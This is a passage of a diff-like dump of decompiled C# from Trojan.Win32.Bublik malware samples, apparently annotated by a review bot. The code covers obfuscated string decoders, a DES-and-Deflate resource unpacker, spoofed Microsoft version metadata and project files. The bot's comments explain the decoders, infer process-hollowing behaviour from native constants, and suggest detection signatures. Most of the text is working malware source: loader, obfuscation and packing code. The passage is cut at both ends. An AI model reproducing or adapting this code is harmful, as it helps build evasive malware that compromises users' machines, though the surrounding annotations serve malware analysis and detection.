public uint \u0006\u2001;
public uint \u000E\u2001;
public uint \u000F\u2001;
public uint \u0002\u2002;
public ushort \u0003\u2002;
public ushort \u0005\u2002;
public uint \u0008\u2002;
public uint \u0006\u2002;
public uint \u000E\u2002;
public uint \u000F\u2002;
public uint \u0002\u2003;
public uint \u0003\u2003;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public \u0003.\u0005\u2001[] \u0005\u2003;
}
private struct \u000E\u2001
{
public uint \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] \u0002\u2000;
public uint \u0003\u2000;
}
private struct \u000F\u2001
{
public uint \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public \u0003.\u000E\u2001 \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public uint \u000E\u2000;
public uint \u000F\u2000;
public uint \u0002\u2001;
public uint \u0003\u2001;
public uint \u0005\u2001;
public uint \u0008\u2001;
public uint \u0006\u2001;
public uint \u000E\u2001;
public uint \u000F\u2001;
public uint \u0002\u2002;
public uint \u0003\u2002;
public uint \u0005\u2002;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] \u0008\u2002;
}
}
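Review bot: The method `\u0002(byte[], string, string)` resolves every native call through `GetProcAddress` with encoded names, so nothing in the file says what it does; the numeric constants are the only readable evidence and deserve a comment. `23117` and `17744` are the `MZ` and `PE\0\0` signatures, the creation flag `4` is CREATE_SUSPENDED, `12288` with `64` is MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE, and `65543` is the x86 CONTEXT_FULL value, a combination consistent with mapping a PE image section by section into a suspended child process (the API names are not visible, so this is inferred from the delegate signatures). I would add above the method `// Native loader: validates MZ/PE, then maps _param1 into a suspended process started from _param3; API names are decoded at run time` and name the structs after the Windows layouts they appear to mirror. For detection, the relevant telemetry is a .NET process starting a suspended child from its own image path, as the caller passes `Application.ExecutablePath`, followed by cross-process memory writes and a thread-context change.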
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
using System.Runtime.InteropServices;
internal sealed class \u0005
{
internal static \u0005.\u0002 \u0002;
[StructLayout(LayoutKind.Explicit, Size = 7, Pack = 1)]
private struct \u0002
{
}
}
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
internal static class \u0006
{
public static byte[] \u0002(byte[] _param0, byte[] _param1)
{
byte num1 = _param0[1];
int length = _param1.Length;
byte num2 = (byte) (length + 11 ^ (int) num1 + 7);
uint num3 = (uint) (((int) _param0[0] | (int) _param0[2] << 8) + ((int) num2 << 3));
ushort num4 = 0;
for (int index = 0; index < length; ++index)
{
if ((index & 1) == 0)
{
num3 = (uint) ((int) num3 * 214013 + 2531011);
num4 = (ushort) (num3 >> 16);
}
byte num5 = (byte) num4;
num4 >>= 8;
byte num6 = _param1[index];
_param1[index] = (byte) ((uint) ((int) num6 ^ (int) num1 ^ (int) num2 + 3) ^ (uint) num5);
num2 = num6;
}
return _param1;
}
}
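Review bot: `\u0006.\u0002` is undocumented although it is the cipher behind the `\u0008.\u0002(...)` string lookups in this assembly, and it decodes `_param1` in place and returns the same array, which the signature does not suggest. The keystream comes from a linear congruential generator with multiplier `214013` and increment `2531011` (the constants of the Microsoft C runtime `rand`), seeded from `_param0[0]`, `_param0[1]`, `_param0[2]` and the data length, and each output byte is also XORed with a value derived from the previous input byte. I would add `// String decoder: XOR stream from LCG(214013, 2531011) seeded by key bytes 0..2 and length; overwrites and returns _param1`. That constant pair next to the chained XOR loop is a usable static signature for this decoder.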
@@ -0,0 +1,101 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
internal static class \u0008
{
private static readonly Dictionary<int, string> \u0002 = new Dictionary<int, string>(47);
private static BinaryReader \u0003;
private static byte[] \u0005;
private static short \u0008;
private static bool \u0006;
private static byte[] \u000E;
private static bool \u000F;
[MethodImpl(MethodImplOptions.NoInlining)]
internal static string \u0002(int _param0)
{
if (\u0008.\u000F)
{
string str;
\u0008.\u0002.TryGetValue(_param0, out str);
return str;
}
lock (\u0008.\u0002)
{
string str1;
if (\u0008.\u0002.TryGetValue(_param0, out str1))
return str1;
if (\u0008.\u0003 == null)
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
\u0008.\u0006 = false;
\u0008.\u0003 = new BinaryReader(executingAssembly.GetManifestResourceStream("\u200B"));
short count = (short) ((int) \u0008.\u0003.ReadInt16() ^ -18656);
if (count == (short) 0)
\u0008.\u0008 = (short) ((int) \u0008.\u0003.ReadInt16() ^ 30416);
else
\u0008.\u0005 = \u0008.\u0003.ReadBytes((int) count);
\u0008.\u000E = executingAssembly.GetName().GetPublicKeyToken();
if (\u0008.\u000E != null && \u0008.\u000E.Length == 0)
\u0008.\u000E = (byte[]) null;
}
int num1 = _param0 ^ -665677667;
\u0008.\u0003.BaseStream.Position = (long) num1;
byte[] numArray;
if (\u0008.\u0005 != null)
{
numArray = \u0008.\u0005;
}
else
{
short count = \u0008.\u0008 != (short) -1 ? \u0008.\u0008 : (short) ((int) \u0008.\u0003.ReadInt16() ^ -31071 ^ num1);
numArray = count != (short) 0 ? \u0008.\u0003.ReadBytes((int) count) : (byte[]) null;
}
int count1 = \u0008.\u0003.ReadInt32() ^ num1 ^ 982698659;
bool flag = (count1 & int.MinValue) != 0;
if (flag)
count1 &= int.MaxValue;
byte[] bytes = \u0006.\u0002(numArray, \u0008.\u0003.ReadBytes(count1));
if (\u0008.\u000E != null != \u0008.\u0006)
{
for (int index = 0; index < count1; ++index)
{
byte num2 = \u0008.\u000E[index & 7];
byte num3 = (byte) ((int) num2 << 3 | (int) num2 >> 5);
bytes[index] = (byte) ((uint) bytes[index] ^ (uint) num3);
}
}
string str2;
if (flag && !\u0008.\u0006)
{
char[] chArray = new char[count1];
for (int index = 0; index < count1; ++index)
chArray[index] = (char) bytes[index];
str2 = new string(chArray);
}
else
str2 = Encoding.Unicode.GetString(bytes, 0, bytes.Length);
if (\u0008.\u0006)
str2 = (_param0 + count1 ^ 936568).ToString("X");
string str3 = string.Intern(str2);
\u0008.\u0002.Add(_param0, str3);
if (\u0008.\u0002.Count == 47)
{
\u0008.\u0003.Close();
\u0008.\u0003 = (BinaryReader) null;
\u0008.\u0005 = \u0008.\u000E = (byte[]) null;
\u0008.\u000F = true;
}
return str3;
}
}
}
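Review bot: The lookup `\u0008.\u0002(int)` needs a comment explaining the ID scheme, because every process name, registry path and file name used by the other classes is hidden behind it. The ID is XORed with `-665677667` to give a byte offset into the manifest resource named `"\u200B"`, a 32-bit length is read and XORed with that offset and `982698659`, and the bytes go through `\u0006.\u0002`; when the assembly has a public key token the result is additionally XORed with rotated token bytes, so the decoded strings depend on the assembly's signing identity. The decompiler header reports `PublicKeyToken=null`, so that branch is presumably not taken for this sample. I would add `// ID ^ -665677667 = offset into resource "\u200B"; results cached in a 47-entry dictionary, reader released once all 47 are decoded` and keep the decoded table in the analysis notes rather than leaving raw IDs at the call sites.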
@@ -0,0 +1,17 @@
using System.Reflection;
using System.Resources;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[assembly: AssemblyDescription("Microsoft Builder Club")]
[assembly: AssemblyTitle("Club")]
[assembly: AssemblyProduct("Builder")]
[assembly: AssemblyCopyright("Copyright (c) Microsoft 2011")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyFileVersion("1.01.0.0")]
[assembly: SuppressIldasm]
[assembly: ComVisible(false)]
[assembly: Guid("2c7c94c1-930a-47cd-9a5f-37466f156633")]
[assembly: NeutralResourcesLanguage("en-AU")]
[assembly: AssemblyVersion("1.0.0.0")]
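Review bot: The attributes `AssemblyCompany("Microsoft")` and `AssemblyCopyright("Copyright (c) Microsoft 2011")` are author-supplied strings and should be marked as such, since the decompiler headers for assembly `Club` further down the page report `PublicKeyToken=null`, i.e. no strong name. A comment such as `// Version-info strings are set by the sample's author and unverified; do not read Company/Copyright as attribution` would keep the metadata from being taken as provenance. Whether the file carries an Authenticode signature is not visible here, but a Microsoft vendor string on a binary without a valid signature is a reasonable triage heuristic. `SuppressIldasm` only asks ildasm to refuse the file and evidently did not stop this decompilation.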
@@ -0,0 +1,57 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{7603EB36-64ED-4E9E-88BA-358782ACC649}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Club</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>A</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="ced138b6eee8b5fea3f196334f6720805.cs" />
<Compile Include="c1a978f6ad601a840a4c556c463434740.cs" />
<Compile Include="c989fcefb2025a0c5c08fe9654b0238e2.cs" />
<Compile Include="c9b81fdde8dea987fa347362a8b38f66c.cs" />
<Compile Include="c0101fd8803cfd89ecc47c2ee5ea3536d.cs" />
<Compile Include="c5269112b03e601219f1714817a27b79a.cs" />
<Compile Include="cfd7a845189f70212b2f34a945b41994e.cs" />
<Compile Include="cb172a3cf4de66a26f276fa336a900f40.cs" />
<Compile Include="cc67fcb12c7ab50e974a357101bdbe09d.cs" />
<Compile Include="Club\Form1.cs" />
<Compile Include="Club\My\MySettings.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Club" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Club", "Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.csproj", "{7603EB36-64ED-4E9E-88BA-358782ACC649}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{7603EB36-64ED-4E9E-88BA-358782ACC649}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{7603EB36-64ED-4E9E-88BA-358782ACC649}.Debug|Any CPU.Build.0 = Debug|Any CPU
{7603EB36-64ED-4E9E-88BA-358782ACC649}.Release|Any CPU.ActiveCfg = Release|Any CPU
{7603EB36-64ED-4E9E-88BA-358782ACC649}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using A;
internal class \u003CModule\u003E
{
static \u003CModule\u003E() => ced138b6eee8b5fea3f196334f6720805.c496a7d7e6524413c65d8aa7379640bb1();
}
@@ -0,0 +1,89 @@
// Decompiled with JetBrains decompiler
// Type: A.c0101fd8803cfd89ecc47c2ee5ea3536d
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using System;
using System.Reflection;
using System.Text;
namespace A
{
internal class c0101fd8803cfd89ecc47c2ee5ea3536d
{
internal static readonly byte[] c112400f52e4f1731c90e00a5d01561a1;
static c0101fd8803cfd89ecc47c2ee5ea3536d()
{
if (c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1 != null)
return;
label_1:
switch (6)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (c0101fd8803cfd89ecc47c2ee5ea3536d.\u002Ecctor);
}
Assembly executingAssembly = Assembly.GetExecutingAssembly();
c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1 = c5269112b03e601219f1714817a27b79a.c09b1f452b50c37ba72a9d599e693a36c(executingAssembly.GetManifestResourceStream(executingAssembly.GetName().Name + executingAssembly.GetName().Name));
break;
}
}
internal static string c63a0ab0f5643f828f13c6bbd6a2b539a(int c6fa5d0055fdf0336425be3f2919ce835)
{
int count;
if (((int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835] & 128) == 0)
{
label_1:
switch (1)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a);
}
count = (int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835];
++c6fa5d0055fdf0336425be3f2919ce835;
break;
}
}
else if (((int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835] & 64) == 0)
{
label_6:
switch (2)
{
case 0:
goto label_6;
default:
count = ((int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835] & -129) << 8 | (int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835 + 1];
c6fa5d0055fdf0336425be3f2919ce835 += 2;
break;
}
}
else
{
count = ((int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835] & -193) << 24 | (int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835 + 1] << 16 | (int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835 + 2] << 8 | (int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835 + 3];
c6fa5d0055fdf0336425be3f2919ce835 += 4;
}
if (count >= 1)
return string.Intern(Encoding.Unicode.GetString(c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1, c6fa5d0055fdf0336425be3f2919ce835, count));
label_10:
switch (7)
{
case 0:
goto label_10;
default:
return string.Empty;
}
}
}
}
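Review bot: `c63a0ab0f5643f828f13c6bbd6a2b539a(int)` has no comment saying that it is the string-table lookup the other classes in this assembly call with a bare integer, so arguments such as `231` or `268` elsewhere on the page cannot be read without tracing this method. From the visible code, the static constructor fills the byte array from the manifest resource named assembly-name + assembly-name, after passing it through `c5269112b03e601219f1714817a27b79a.c09b1f452b50c37ba72a9d599e693a36c`. The method then reads a length prefix at the given offset (one byte when bit 7 is clear, two bytes when bit 7 is set and bit 6 is clear, four bytes otherwise) and returns that many bytes decoded with `Encoding.Unicode`, interned. I would add above the method `// String-table lookup: arg = byte offset into the decoded resource; 1/2/4-byte length prefix, then UTF-16LE text`. A second comment should mark the `switch (N) { case 0: goto label_N; }` blocks and the `if (false) { __methodref ... }` stubs as control-flow padding that does no work, so readers can skip them.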
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: A.c1a978f6ad601a840a4c556c463434740
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Windows.Forms;
namespace A
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class c1a978f6ad601a840a4c556c463434740 : WindowsFormsApplicationBase
{
[DebuggerStepThrough]
public c1a978f6ad601a840a4c556c463434740()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[STAThread]
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static void ced167a9eb7ac3392976147c9472db7e2(
string[] c5f57efc49d6476e70207a1b8d3f1ca77)
{
try
{
cb172a3cf4de66a26f276fa336a900f40.c8a7fc1893bd951199feb87a0595012ad();
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
c9b81fdde8dea987fa347362a8b38f66c.c8b84d0974b93f773bcc7dafeea38d1e0.Run(c5f57efc49d6476e70207a1b8d3f1ca77);
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) c9b81fdde8dea987fa347362a8b38f66c.c0d14e620a03587bae92914b08d618907.cf7c417efd3c27564c3ec7f3ff8a83d6a;
}
}
@@ -0,0 +1,231 @@
// Decompiled with JetBrains decompiler
// Type: A.c5269112b03e601219f1714817a27b79a
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using System;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Security.Cryptography;
namespace A
{
internal class c5269112b03e601219f1714817a27b79a
{
private static MemoryStream cd2eaac5e5f73ec3a66fdd3ed367eeced;
private static MemoryStream c6f2cbc6593d40410ef94f1b8258739e0;
private static object c1f7900f43ed675e62b2abd919f121dd3;
private static int cda9a7d97b6e4e1056818dbe1f3855a7c = int.MaxValue;
private static int c14664cb24e0f9f35e1b155f5f1c3a44b = int.MinValue;
static c5269112b03e601219f1714817a27b79a()
{
c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced = (MemoryStream) null;
c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0 = (MemoryStream) null;
c5269112b03e601219f1714817a27b79a.c1f7900f43ed675e62b2abd919f121dd3 = new object();
}
internal static byte[] c09b1f452b50c37ba72a9d599e693a36c(
Stream c97c5608f851a4e11ad0df790743f222e)
{
lock (c5269112b03e601219f1714817a27b79a.c1f7900f43ed675e62b2abd919f121dd3)
{
Stream stream = c97c5608f851a4e11ad0df790743f222e;
MemoryStream memoryStream = (MemoryStream) null;
byte num1 = (byte) c97c5608f851a4e11ad0df790743f222e.ReadByte();
if (((int) num1 & 1) != 0)
{
label_2:
switch (5)
{
case 0:
goto label_2;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (c5269112b03e601219f1714817a27b79a.c09b1f452b50c37ba72a9d599e693a36c);
}
DESCryptoServiceProvider cryptoServiceProvider = new DESCryptoServiceProvider();
byte[] buffer1 = new byte[8];
c97c5608f851a4e11ad0df790743f222e.Read(buffer1, 0, 8);
cryptoServiceProvider.IV = buffer1;
byte[] buffer2 = new byte[8];
c97c5608f851a4e11ad0df790743f222e.Read(buffer2, 0, 8);
bool flag = true;
foreach (byte num2 in buffer2)
{
if (num2 != (byte) 0)
{
flag = false;
goto label_11;
}
}
label_10:
switch (3)
{
case 0:
goto label_10;
}
label_11:
if (flag)
buffer2 = Assembly.GetExecutingAssembly().GetName().GetPublicKeyToken();
cryptoServiceProvider.Key = buffer2;
if (c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced == null)
{
label_14:
switch (1)
{
case 0:
goto label_14;
default:
if (c5269112b03e601219f1714817a27b79a.cda9a7d97b6e4e1056818dbe1f3855a7c == int.MaxValue)
{
label_16:
switch (5)
{
case 0:
goto label_16;
default:
c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced = new MemoryStream((int) c97c5608f851a4e11ad0df790743f222e.Length);
break;
}
}
else
{
c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced = new MemoryStream(c5269112b03e601219f1714817a27b79a.cda9a7d97b6e4e1056818dbe1f3855a7c);
break;
}
break;
}
}
c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced.Position = 0L;
ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor();
int inputBlockSize = decryptor.InputBlockSize;
int outputBlockSize = decryptor.OutputBlockSize;
byte[] numArray1 = new byte[decryptor.OutputBlockSize];
byte[] numArray2 = new byte[decryptor.InputBlockSize];
int position;
for (position = (int) c97c5608f851a4e11ad0df790743f222e.Position; (long) (position + inputBlockSize) < c97c5608f851a4e11ad0df790743f222e.Length; position += inputBlockSize)
{
c97c5608f851a4e11ad0df790743f222e.Read(numArray2, 0, inputBlockSize);
int count = decryptor.TransformBlock(numArray2, 0, inputBlockSize, numArray1, 0);
c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced.Write(numArray1, 0, count);
}
label_22:
switch (3)
{
case 0:
goto label_22;
default:
c97c5608f851a4e11ad0df790743f222e.Read(numArray2, 0, (int) (c97c5608f851a4e11ad0df790743f222e.Length - (long) position));
byte[] buffer3 = decryptor.TransformFinalBlock(numArray2, 0, (int) (c97c5608f851a4e11ad0df790743f222e.Length - (long) position));
c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced.Write(buffer3, 0, buffer3.Length);
stream = (Stream) c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced;
stream.Position = 0L;
memoryStream = c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced;
break;
}
break;
}
}
if (((int) num1 & 2) != 0)
{
label_25:
switch (3)
{
case 0:
goto label_25;
default:
try
{
if (c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0 == null)
{
label_27:
switch (6)
{
case 0:
goto label_27;
default:
if (c5269112b03e601219f1714817a27b79a.c14664cb24e0f9f35e1b155f5f1c3a44b == int.MinValue)
{
label_29:
switch (7)
{
case 0:
goto label_29;
default:
c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0 = new MemoryStream((int) stream.Length * 2);
break;
}
}
else
{
c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0 = new MemoryStream(c5269112b03e601219f1714817a27b79a.c14664cb24e0f9f35e1b155f5f1c3a44b);
break;
}
break;
}
}
c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0.Position = 0L;
DeflateStream deflateStream = new DeflateStream(stream, CompressionMode.Decompress);
int count1 = 1000;
byte[] buffer = new byte[count1];
int count2;
do
{
count2 = deflateStream.Read(buffer, 0, count1);
if (count2 > 0)
{
label_34:
switch (1)
{
case 0:
goto label_34;
default:
c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0.Write(buffer, 0, count2);
break;
}
}
}
while (count2 >= count1);
label_37:
switch (4)
{
case 0:
goto label_37;
default:
memoryStream = c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0;
break;
}
}
catch (Exception ex)
{
break;
}
break;
}
}
if (memoryStream != null)
{
label_41:
switch (5)
{
case 0:
goto label_41;
default:
return memoryStream.ToArray();
}
}
else
{
byte[] buffer = new byte[c97c5608f851a4e11ad0df790743f222e.Length - c97c5608f851a4e11ad0df790743f222e.Position];
c97c5608f851a4e11ad0df790743f222e.Read(buffer, 0, buffer.Length);
return buffer;
}
}
}
}
}
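Review bot: `c09b1f452b50c37ba72a9d599e693a36c(Stream)` needs a header comment, because it is the routine that unwraps the embedded resources and its input format can only be recovered by reading through roughly two hundred lines of padded control flow. As written, the first byte is a flag: bit 0 selects DES decryption using an 8-byte IV and an 8-byte key read from the stream itself (an all-zero key is replaced by the assembly's public key token), bit 1 selects Deflate decompression of the result, and with neither bit set the remaining bytes are returned unchanged. Because the key material sits next to the ciphertext, the DES layer only hides the resource from casual inspection, and the comment should say so, e.g. `// flag byte | IV(8) | key(8) | DES ciphertext, optionally Deflate-compressed; key is stored in the resource itself`. The comment should also warn that `catch (Exception ex)` at the Deflate step discards the error and that the read loop ends at the first read shorter than 1000 bytes, so a partial result can be returned without any signal. The static `MemoryStream` fields are reused with only `Position = 0L` reset before `ToArray()`, which looks like it could return stale trailing bytes on a later, shorter call; that is worth a `// NOTE` for anyone re-implementing the unwrapping for analysis.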
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: A.c989fcefb2025a0c5c08fe9654b0238e2
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace A
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class c989fcefb2025a0c5c08fe9654b0238e2 : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public c989fcefb2025a0c5c08fe9654b0238e2()
{
}
}
}
@@ -0,0 +1,310 @@
// Decompiled with JetBrains decompiler
// Type: A.c9b81fdde8dea987fa347362a8b38f66c
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using Club;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
